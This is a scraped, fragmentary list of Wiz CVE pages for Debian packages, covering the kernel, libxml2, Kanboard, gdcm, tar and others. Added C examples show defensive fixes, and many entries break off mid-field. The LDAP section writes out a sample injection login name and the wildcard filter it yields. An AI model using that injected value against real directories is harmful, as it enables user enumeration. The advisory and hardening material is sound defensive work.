bo_number field. Although the previous multiplication overflow check
prevents out-of-bounds allocation, a large number of entries could still
cause excessive memory allocation (up to potentially gigabytes) and
unnecessarily long list processing times.
Introduce a hard limit of 128k entries per BO list, which is more than
sufficient for any realistic use case (e.g., a single list containing all
buffers in a large scene). This prevents memory exhaustion attacks and
ensures predictable performance.
Return -EINVAL if t
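The commit text above separates two different checks: a multiplication-overflow guard, which is enough to keep the allocation in bounds, and a hard cap on `bo_number`, which is what stops an unprivileged caller from asking for gigabytes. The C below is an added example, not amdgpu's code: `struct bo_entry` is a placeholder layout, `BO_LIST_MAX_ENTRIES` spells out the "128k" figure from the card, and the function names are assumptions. It shows a 2^28-entry request sailing through the overflow-only guard and being refused by the capped version.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumption: the "128k entries" limit from the commit text, as a constant. */
#define BO_LIST_MAX_ENTRIES (128u * 1024u)

/* Placeholder entry layout; the real driver structure is not reproduced here. */
struct bo_entry {
    uint32_t handle;
    uint32_t priority;
};

/* Pre-fix shape: only the multiplication is guarded, so bo_number = 2^28 with
 * 8-byte entries (2 GiB) is accepted and handed to the allocator. */
static int bo_list_size_overflow_only(uint64_t bo_number, size_t entry_size, size_t *bytes)
{
    if (bo_number != 0 && entry_size > SIZE_MAX / bo_number)
        return -EOVERFLOW;
    *bytes = (size_t)bo_number * entry_size;
    return 0;
}

/* Post-fix shape: hard cap first (-EINVAL, as the commit text says), and the
 * overflow guard kept as defence in depth for entry sizes the cap alone would not bound. */
static int bo_list_size(uint64_t bo_number, size_t entry_size, size_t *bytes)
{
    if (bo_number > BO_LIST_MAX_ENTRIES)
        return -EINVAL;
    if (bo_number != 0 && entry_size > SIZE_MAX / bo_number)
        return -EOVERFLOW;
    *bytes = (size_t)bo_number * entry_size;
    return 0;
}

/* Convenience wrapper: the capped size in bytes, or 0 if the request is rejected. */
static size_t bo_list_bytes(uint64_t bo_number, size_t entry_size)
{
    size_t bytes = 0;
    return bo_list_size(bo_number, entry_size, &bytes) == 0 ? bytes : 0;
}

int main(void)
{
    size_t bytes = 0;
    uint64_t huge = (uint64_t)1 << 28;   /* constructed: user-controlled count */

    int r1 = bo_list_size_overflow_only(huge, sizeof(struct bo_entry), &bytes);
    printf("overflow-only: rc=%d bytes=%zu\n", r1, bytes);
    int r2 = bo_list_size(huge, sizeof(struct bo_entry), &bytes);
    printf("capped:        rc=%d\n", r2);
    return 0;
}
```

An overflow check answers "is the arithmetic correct"; a cap answers "is this amount reasonable for one caller". Both belong at an ioctl boundary, and the cap should be chosen from what legitimate userspace actually needs, which is how the card justifies 128k.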
Wiz: CVE-2022-50812 Impact, Exploitability, and Mitigation Steps (CVSS 5.3, MEDIUM)
## CVE-2022-50812: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
security: Restrict CONFIG_ZERO_CALL_USED_REGS to gcc or clang > 15.0.6
A bad bug in clang's implementation of -fzero-call-used-regs can result
in NULL pointer dereferences (see the links above the check for more
information). Restrict CONFIG_CC_HAS_ZERO_CALL_USED_REGS to either a
supported GCC version or a clang newer than 15.0.6, which will catch
both a theoretical 15.0.7 and the upcoming 16.0.0, which will both have
the bug fixed.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation
Wiz: CVE-2025-71241 Impact, Exploitability, and Mitigation Steps (CVSS 4.8, MEDIUM)
## CVE-2025-71241: Linux Debian vulnerability analysis and mitigation
SPIP before 4.3.6, 4.2.17, and 4.1.20 allows Cross-Site Scripting (XSS) in the private area. The content of the error message displayed by the 'transmettre' API is not properly sanitized, allowing an attacker to inject malicious scripts. This vulnerability is mitigated by the SPIP security screen.
Source : NVD
Score 4.8
Published February 19, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
spip
Sources
NVD
Debian 11 Severity MEDIUM No Fix Added at: Feb 20, 2026
## CVE-2025-52582 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 7.4, severity HIGH
An out-of-bounds read vulnerability exists in the Overlay::GrabOverlayFromPixelData functionality of Grassroot DICOM 3.024. A specially crafted DICOM file can lead to an information leak. An attacker can provide a malicious file to trigger this vulnerability.
Source : NVD
Score 7.5
Published December 16, 2025
Severity HIGH
CNA Score 7.4
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
gdcm
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 18, 2025
Debian 14 Severity HIGH No Fix
## CVE-2024-38798 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 5.8, severity MEDIUM
EDK2 contains a vulnerability in BIOS where an attacker may cause "Exposure of Sensitive Information to an Unauthorized Actor" by local access. Successful exploitation of this vulnerability will lead to possible information disclosure or escalation of privilege and impact Confidentiality.
Source : NVD
Score 5.8
Published December 9, 2025
Severity MEDIUM
CNA Score 5.8
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
edk2-debuginfo
edk2-ovmf
Sources
NVD
Debian 11, 14 No Fix Added at: Dec
## CVE-2022-50753 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to do sanity check on summary info
As Wenqing Liu reported in bugzilla:
https://bugzilla.kernel.org/show_bug.cgi?id=216456
BUG: KASAN: use-after-free in recover_data+0x63ae/0x6ae0 [f2fs]
Read of size 4 at addr ffff8881464dcd80 by task mount/1013
CPU: 3 PID: 1013 Comm: mount Tainted: G W 6.0.0-rc4 #1
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.15.0-1 04/01/2014
Call Trace:
dump_stack_lvl+0x45/0x5e
print_report.cold+0xf3/0x68d
kasan_report+0xa8/0x130
recover_data+0x63ae/0x6ae0 [f2fs]
f2fs_recover_fsync_data+0x120d/0x1fc0 [f2fs]
f2fs_fill_super+0x4665/0x61e0 [f2fs]
mount_bdev+0x2cf/0x3b0
legacy_get_tree+0xed/0x1d0
vfs_get_tr
## CVE-2026-23041 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
bnxt_en: Fix NULL pointer crash in bnxt_ptp_enable during error cleanup
When bnxt_init_one() fails during initialization (e.g.,
bnxt_init_int_mode returns -ENODEV), the error path calls
bnxt_free_hwrm_resources() which destroys the DMA pool and sets
bp->hwrm_dma_pool to NULL. Subsequently, bnxt_ptp_clear() is called,
which invokes ptp_clock_unregister().
Since commit a60fc3294a37 ("ptp: rework ptp_clock_unregister() to
disable events"), ptp_clock_unregister() now calls
ptp_disable_all_events(), which in turn invokes the driver's .enable()
callback (bnxt_ptp_enable()) to disable PTP events before completing the
unregistration.
bnxt_ptp_enable() att
## CVE-2025-68462 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 3.2, severity LOW
Freedombox before 25.17.1 does not set proper permissions for the backups-data directory, allowing the reading of dump files of databases.
Source : NVD
Score 3.2
Published December 18, 2025
Severity LOW
CNA Score 3.2
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
freedombox
Sources
NVD
Debian 11, 12 Severity MEDIUM No Fix Added at: Dec 18, 2025
Debian 13, 14 Severity LOW Has Fix Added at: Dec 18, 2025
Echo Severity LOW Has Fix Added at: Dec 21, 2025
## Get a CVE risk assessment
Get a prior
## CVE-2025-67859 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 5.1, severity MEDIUM
An Improper Authentication vulnerability in TLP allows local users to arbitrarily control the power profile in use as well as the daemon's log settings. This issue affects TLP: from 1.9 before 1.9.1.
Source : NVD
Score 5.1
Published January 14, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
tlp
Sources
NVD
Debian 14 Has Fix Added at: Jan 11, 2026
## CVE-2026-0989 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 3.7, severity LOW
A flaw was identified in the RelaxNG parser of libxml2 related to how external schema inclusions are handled. The parser does not enforce a limit on inclusion depth when resolving nested directives. Specially crafted or overly complex schemas can cause excessive recursion during parsing. This may lead to stack exhaustion and application crashes, creating a denial-of-service risk.
Source : NVD
Score 3.7
Published January 15, 2026
Severity LOW
CNA Score 3.7
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.5
Exploitation Probability (EPSS) N/A
Affected packages and
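The libxml2 description above is about one specific control: a limit on how deeply nested schema inclusions may go, so that a cyclic or absurdly deep include chain fails cleanly instead of exhausting the stack. As an added example (not libxml2 code), this C block resolves includes over a small constructed schema graph with a depth counter; the graph, the schema names and the limit value are assumptions chosen for illustration.

```c
#include <stddef.h>
#include <string.h>

/* Added example, not libxml2 code: a depth-bounded include resolver
 * standing in for RelaxNG <include>/<externalRef> handling. */
#define MAX_INCLUDE_DEPTH 16

struct schema {
	const char *name;
	const char *includes[3];   /* NULL-terminated list of included schemas */
};

/* Constructed graph: "a" -> "b" -> "c" -> "a" is a cycle, "top" -> "leaf"
 * is not. An unbounded resolver recurses forever on the cycle. */
static const struct schema GRAPH[] = {
	{ "a",    { "b", NULL } },
	{ "b",    { "c", NULL } },
	{ "c",    { "a", NULL } },
	{ "leaf", { NULL } },
	{ "top",  { "leaf", NULL } },
};

static const struct schema *find_schema(const char *name)
{
	for (size_t i = 0; i < sizeof GRAPH / sizeof GRAPH[0]; i++)
		if (strcmp(GRAPH[i].name, name) == 0)
			return &GRAPH[i];
	return NULL;
}

/* Resolve every transitive include. Returns the number of schema
 * documents visited, -1 for an unknown schema, or -2 when the nesting
 * limit is exceeded (the case the unfixed parser turned into a crash). */
static int resolve_includes(const char *name, int depth)
{
	const struct schema *s = find_schema(name);
	int visited = 1;

	if (!s)
		return -1;
	if (depth > MAX_INCLUDE_DEPTH)
		return -2;
	for (size_t i = 0; s->includes[i]; i++) {
		int r = resolve_includes(s->includes[i], depth + 1);

		if (r < 0)
			return r;
		visited += r;
	}
	return visited;
}

/* Entry point: load a schema and all of its includes. */
int load_schema(const char *name)
{
	return resolve_includes(name, 0);
}
```

A real resolver would also keep a visited set so that a legitimate diamond-shaped include graph is not counted twice; the depth bound is the part that turns a stack overflow into an error return.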
## CVE-2018-25154 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 8.5, severity HIGH
GNU Barcode 0.99 contains a buffer overflow vulnerability in its code 93 encoding process that allows attackers to trigger memory corruption. Attackers can exploit boundary errors during input file processing to potentially execute arbitrary code on the affected system.
Source : NVD
Score 8.5
Published December 24, 2025
Severity HIGH
CNA Score 8.5
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 23
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
barcode
Sources
NVD
Debian 11, 12, 13, 14 Severity LOW No Fix Added at: Dec 26, 2025
Echo Severity CRI
## CVE-2025-59024 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 6.5, severity MEDIUM
Crafted delegations or IP fragments can poison cached delegations in Recursor.
Source : NVD
Score 6.5
Published February 9, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Linux Debian
Linux Alpine
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pdns-recursor
Sources
NVD
Alpine 3.22, edge Severity MEDIUM Has Fix Added at: Oct 23, 2025
Alpine 3.23 Severity MEDIUM Has Fix Added at: Dec 04, 2025
Debian 11, 12 Severity MEDIUM No Fix Added at: Oct 23, 2025
Debian 13, 14 Severity MEDIUM Has Fix Added at: Oct 23, 2025
Echo Severi
## CVE-2026-5704 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 5.3, severity MEDIUM
A flaw was found in tar. A remote attacker could exploit this vulnerability by crafting a malicious archive, leading to hidden file injection with fully attacker-controlled content. This bypasses pre-extraction inspection mechanisms, potentially allowing an attacker to introduce malicious files onto a system without detection.
Source : NVD
Score 5.0
Published April 6, 2026
Severity MEDIUM
CNA Score 5.0
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
tar
Sources
NVD
Debian 11, 12, 13, 14 Sever
## CVE-2023-54147 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 5.3, severity MEDIUM
In the Linux kernel, the following vulnerability has been resolved:
media: platform: mtk-mdp3: Add missing check and free for ida_alloc
Add the check for the return value of the ida_alloc in order to avoid
NULL pointer dereference.
Moreover, free allocated "ctx->id" if mdp_m2m_open fails later in order
to avoid memory leak.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-gcp-fips
linux
Sources
NVD
Debian 12, 13, 14 Has Fix Added at:
## CVE-2026-2641 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 4.8, severity MEDIUM
A weakness has been identified in universal-ctags ctags up to 6.2.1. The affected element is the function parseExpression/parseExprList of the file parsers/v.c of the component V Language Parser. Executing a manipulation can lead to uncontrolled recursion. It is possible to launch the attack on the local host. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
Score 4.8
Published February 18, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exp
## CVE-2025-67480 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 5.3, severity MEDIUM
Vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files includes/Api/ApiQueryRevisionsBase.Php.
This issue affects MediaWiki: from * before 1.39.16, 1.43.6, 1.44.3, 1.45.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 33.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Dec 12, 2025
Echo Has Fix Added at: Dec 12, 2025
## CVE-2026-3195 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 5.3, severity MEDIUM
two potential OOB memory accesses in virtio-snd
Source : NVD
Published March 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
qemu
Sources
NVD
Debian 13 Severity MEDIUM No Fix Added at: Mar 03, 2026
Debian 14 Has Fix Added at: Mar 03, 2026
Ubuntu 24.04, 25.10 Severity MEDIUM No Fix Added at: Apr 02, 2026
## CVE-2026-4359 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 5.3, severity MEDIUM
A compromised third party cloud server or man-in-the-middle attacker could send a malformed HTTP response and cause a crash in applications using the MongoDB C driver.
Source : NVD
Score 2.0
Published March 17, 2026
Severity LOW
CNA Score 2.0
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
libbson
mongo-c-driver-debuginfo
Sources
NVD
Debian 11, 12, 13 Severity LOW No Fix Added at: Mar 17, 2026
Debian 14 Severity LOW Has Fix Added at: Mar 17, 2026
Echo Severity LOW No Fix Added at: Mar 17
## CVE-2025-40335 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 5.3, severity MEDIUM
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: validate userq input args
This will help on validating the userq input args, and
rejecting for the invalid userq request at the IOCTLs
first place.
Source : NVD
Score 5.1
Published December 9, 2025
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-nvidia
linux-oem-6.14
Sources
NVD
Debian 11, 12, 13 No Fix Added at: Dec 09, 2025
Debian 14 Has Fix Added at: Dec 09, 2025
Ech
## CVE-2026-23338 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 5.3, severity MEDIUM
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu/userq: Do not allow userspace to trivially trigger kernel warnings
Userspace can either deliberately pass in the too small num_fences, or the
required number can legitimately grow between the two calls to the userq
wait ioctl. In both cases we do not want to emit the kernel warning
backtrace since nothing is wrong with the kernel and userspace will simply
get an errno reported back. So let's simply drop the WARN_ONs.
(cherry picked from commit 2c333ea579de6cc20ea7bc50e9595ef72863e65c)
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
C
## CVE-2025-53619 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 7.4, severity HIGH
null_convert
Source : NVD
Score 9.1
Published December 16, 2025
Severity CRITICAL
CNA Score 7.4
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
gdcm
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 18, 2025
Debian 14 Severity CRITICAL No Fix Added at: Dec 18, 2025
Echo Severity CRITICAL No Fix Added at: Dec 18, 2025
## CVE-2025-6593 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 2.1, severity LOW
Vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files includes/user/User.Php.
This issue affects MediaWiki: from 1.27.0 before 1.39.13, 1.42.7, 1.43.2, 1.44.0.
Source : NVD
Score 2.1
Published February 2, 2026
Severity LOW
CNA Score 2.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13 Has Fix Added at: Jul 03, 2025
Debian 14 Has Fix Added at: Aug 10, 2025
Echo Has Fix Added at: Nov 18, 2025
## CVE-2026-21880 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 5.3, severity MEDIUM
Kanboard is project management software focused on Kanban methodology. Versions 1.2.48 and below have an LDAP Injection vulnerability in the LDAP authentication mechanism. User-supplied input is directly substituted into LDAP search filters without proper sanitization, allowing attackers to enumerate all LDAP users, discover sensitive user attributes, and perform targeted attacks against specific accounts. This issue is fixed in version 1.2.49.
Source : NVD
Score 5.3
Published January 8, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 31.9
Ex
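The Kanboard description above names the root cause precisely: user input substituted into an LDAP search filter without escaping. As an added example (not Kanboard code, which is PHP; the filter template and the function names are assumptions), this C block shows the vulnerable concatenation beside a version that escapes the assertion value per RFC 4515, and what each produces for a login name chosen to add a wildcard clause.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not Kanboard code. Escapes an LDAP assertion value per
 * RFC 4515: '*', '(', ')' and '\' become \xx so the value can neither
 * close the enclosing filter nor introduce a wildcard. A NUL byte would
 * be escaped the same way, but a C string cannot carry one. Returns the
 * escaped length, or 0 when the output buffer is too small (a truncated
 * filter must never be sent). */
size_t ldap_escape_value(const char *in, char *out, size_t outsz)
{
	static const char hex[] = "0123456789abcdef";
	size_t o = 0;

	if (outsz == 0)
		return 0;
	for (const unsigned char *p = (const unsigned char *)in; *p; p++) {
		int special = (*p == '*' || *p == '(' || *p == ')' || *p == '\\');
		size_t need = special ? 3 : 1;

		if (o + need >= outsz)
			return 0;
		if (special) {
			out[o++] = '\\';
			out[o++] = hex[*p >> 4];
			out[o++] = hex[*p & 0x0f];
		} else {
			out[o++] = (char)*p;
		}
	}
	out[o] = '\0';
	return o;
}

/* Vulnerable pattern: the login name lands in the filter verbatim. */
int build_uid_filter_unsafe(const char *user, char *out, size_t outsz)
{
	return snprintf(out, outsz, "(&(objectClass=person)(uid=%s))", user);
}

/* Fixed pattern: escape first, then build. Returns -1 if escaping fails. */
int build_uid_filter_safe(const char *user, char *out, size_t outsz)
{
	char esc[512];

	if (ldap_escape_value(user, esc, sizeof esc) == 0 && user[0] != '\0')
		return -1;
	return snprintf(out, outsz, "(&(objectClass=person)(uid=%s))", esc);
}

/* Wrappers returning static storage, for the checks below. */
const char *uid_filter_unsafe(const char *user)
{
	static char buf[1024];

	build_uid_filter_unsafe(user, buf, sizeof buf);
	return buf;
}

const char *uid_filter_safe(const char *user)
{
	static char buf[1024];

	return build_uid_filter_safe(user, buf, sizeof buf) < 0 ? NULL : buf;
}
```

For the login name `*)(uid=*` the unsafe builder emits `(&(objectClass=person)(uid=*)(uid=*))`, a filter that matches every person entry, which is the enumeration the description warns about; the escaped builder emits `(uid=\2a\29\28uid=\2a)`, a literal match that returns nothing.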
## CVE-2026-5201 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 5.3, severity MEDIUM
A flaw was found in the gdk-pixbuf library. This heap-based buffer overflow vulnerability occurs in the JPEG image loader due to improper validation of color component counts when processing a specially crafted JPEG image. A remote attacker can exploit this flaw without user interaction, for example, via thumbnail generation. Successful exploitation leads to application crashes and denial of service (DoS) conditions.
Source : NVD
Score 7.5
Published March 31, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 30.6
Exploitation Probab
## CVE-2025-58150 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 8.8, severity HIGH
Shadow mode tracing code uses a set of per-CPU variables to avoid
cumbersome parameter passing. Some of these variables are written to
with guest controlled data, of guest controllable size. That size can
be larger than the variable, and bounding of the writes was missing.
Source : NVD
Score 8.8
Published January 28, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
xen-debuginfo
xen-devel
Sources
NVD
Alpine 3.20, 3.21, 3.22, 3.23, edge Severity HIGH Has Fi
## CVE-2026-2436 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 6.5, severity MEDIUM
soup_server_disconnect()
Source : NVD
Score 6.5
Published March 26, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 32.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
libsoup
libsoup3
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Mar 12, 2026
Echo Severity MEDIUM No Fix Added at: Mar 13, 2026
Red Hat 6, 7, 8, 9, 10 Severity MEDIUM No Fix Added at: Mar 11, 2026
## CVE-2025-66048 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 9.8, severity CRITICAL
Several stack-based buffer overflow vulnerabilities exist in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities. When Tag is 133
Source : NVD
Score 9.8
Published December 11, 2025
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 35.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
biosig
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 12,
## CVE-2025-71158 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 5.5, severity MEDIUM
In the Linux kernel, the following vulnerability has been resolved:
gpio: mpsse: ensure worker is torn down
When an IRQ worker is running, unplugging the device would cause a
crash. The sealevel hardware this driver was written for was not
hotpluggable, so I never realized it.
This change uses a spinlock to protect a list of workers, which
it tears down on disconnect.
Source : NVD
Score 5.5
Published January 23, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.8
Exploitation Probability (EPSS) N/A
Affected packages and libra
## CVE-2025-43904 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 4.2, severity MEDIUM
In SchedMD Slurm before 24.11.5, 24.05.8, and 23.11.11, the accounting system can allow a Coordinator to promote a user to Administrator.
Source : NVD
Score 4.2
Published January 16, 2026
Severity MEDIUM
CNA Score 4.2
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
slurm_22_05-auth-none
slurm_22_05-node
Sources
NVD
Debian 11 Severity MEDIUM No Fix Added at: Jul 08, 2025
Debian 12, 13 Severity MEDIUM Has Fix Added at: Jul 08, 2025
Debian 14 Severity MEDIUM Has Fix Added at: Aug 10, 2025
## CVE-2025-11175 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 8.8, severity HIGH
Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection') vulnerability in The Wikimedia Foundation Mediawiki - DiscussionTools Extension allows Regular Expression Exponential Blowup. This issue affects Mediawiki - DiscussionTools Extension: 1.44, 1.43.
Source : NVD
Score 8.8
Published January 30, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 13, 14 Has Fix Added at: Oct 03, 2025
## CVE-2025-68460 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 7.2, severity HIGH
Roundcube Webmail before 1.5.12 and 1.6 before 1.6.12 is prone to a information disclosure vulnerability in the HTML style sanitizer.
Source : NVD
Score 7.5
Published December 18, 2025
Severity HIGH
CNA Score 7.2
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
roundcube
roundcubemail
Sources
NVD
Debian 11, 12, 13, 14 Severity HIGH Has Fix Added at: Dec 18, 2025
Echo Severity HIGH Has Fix Added at: Dec 21, 2025
Ubuntu 25.04, 25.10 Severity MEDIUM No Fix Added at: Jan 11, 2026
## CVE-2025-14369 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 5.5, severity MEDIUM
dr_flac, an audio decoder within the dr_libs toolset, contains an integer overflow vulnerability due to trusting the totalPCMFrameCount field from FLAC metadata before calculating buffer size, allowing an attacker with a specially crafted file to perform DoS against programs using the tool.
Source : NVD
Score 5.5
Published January 20, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
